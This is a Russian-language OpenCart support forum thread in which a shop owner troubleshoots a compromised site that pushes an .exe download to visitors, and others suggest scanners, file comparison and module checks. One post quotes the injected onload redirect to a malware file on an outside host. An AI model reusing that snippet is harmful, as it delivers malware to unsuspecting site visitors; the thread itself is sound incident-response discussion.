Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Вирус закачивается на компьютер при открытии сайта


Recommended Posts

ocstore 2.3.0.2.3 
newstore

При посещении главной страницы сайта, загружается на компьютер exe файл c другого магазина сделаного также на opencart
обращение в поддержку хостинга особо не помогло.
Где копать?

Надіслати
Поділитися на інших сайтах


09.10.2022 в 09:27, borborich сказал:

Где копать?

Заходите в панель управления хостинга и ищите измененные файлы, время создания/модификации которых отличается от остальных. 

Известно ли, как называется вредоносный exe?

Змінено користувачем esculapra
Надіслати
Поділитися на інших сайтах

09.10.2022 в 08:27, borborich сказал:

ocstore 2.3.0.2.3 
newstore

При посещении главной страницы сайта, загружается на компьютер exe файл c другого магазина сделаного также на opencart
обращение в поддержку хостинга особо не помогло.
Где копать?

 

https://opencartforum.com/files/file/8788-chistka-saytov-i-serverov-ot-virusov/

  • +1 1
Надіслати
Поділитися на інших сайтах

09.10.2022 в 08:47, esculapra сказал:

Заходите в панель управления хостинга и ищите измененные файлы, время создания/модификации которых отличается от остальных. 

Известно ли, как называется вредоносный exe?

 

Делал откат на месяц назад, тогда этой проблемы не было, но не помогло.
Файл называется прайслист.exe качается с другого сервера.

Надіслати
Поділитися на інших сайтах


10.10.2022 в 09:37, borborich сказал:

Делал откат на месяц назад

Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

Надіслати
Поділитися на інших сайтах

10.10.2022 в 09:21, esculapra сказал:

Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

Спасибо, сейчас буду делать

 

Надіслати
Поділитися на інших сайтах


10.10.2022 в 09:21, esculapra сказал:

Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

 

ai-bolt что то пропустил все файлы

Schermata 2022-10-10 alle 11.59.07.png

Надіслати
Поділитися на інших сайтах


10.10.2022 в 13:00, borborich сказал:

 

ai-bolt что то пропустил все файлы

Schermata 2022-10-10 alle 11.59.07.png

Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом

Змінено користувачем SSHEVA
  • +1 1
Надіслати
Поділитися на інших сайтах

10.10.2022 в 12:12, SSHEVA сказал:

Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом

 

каким антивирусом пользовались?

Надіслати
Поділитися на інших сайтах


10.10.2022 в 14:16, borborich сказал:

 

каким антивирусом пользовались?

ESET SMART SECURITY PREMIUM

Надіслати
Поділитися на інших сайтах

10.10.2022 в 13:12, SSHEVA сказал:

Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК

Я еще не успел этого написать. Да, если на сайте плотно поковырялись, то антивирус реально найдет. Айболит должен был найти, но видимо там нет явного кода. Можно попробовать параноидальный режим. Хотя, если это в картинках то может не найти - проще посмотреть исходный код страницы и какие картинки подключаются, а потом сравнить их по времени создания. Картинки также могут подключаться через стили, но тут откат бы все исправил.

Змінено користувачем esculapra
Надіслати
Поділитися на інших сайтах

10.10.2022 в 16:44, borborich сказал:

ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать.

Schermata 2022-10-10 alle 15.03.48.png

После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще  Поиск использовать в редакторе.

Надіслати
Поділитися на інших сайтах

10.10.2022 в 15:54, SSHEVA сказал:

После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще  Поиск использовать в редакторе.

спасибо, собственно для этого и скачиваю

Надіслати
Поділитися на інших сайтах


Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';">
дают ноль результатов

Надіслати
Поділитися на інших сайтах


11.10.2022 в 12:18, borborich сказал:

Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';">
дают ноль результатов

Тогда нужно смотреть уже сайт, так вслепую сложно сказать

Надіслати
Поділитися на інших сайтах

11.10.2022 в 20:38, 29aleksey сказал:

В настройки шаблона в поле код счетчика прописывается только с админки 

 

подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда

Надіслати
Поділитися на інших сайтах


В 12.10.2022 в 15:48, borborich сказав:

 

подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда

Звучит это все как фантастика :huh:

Надіслати
Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.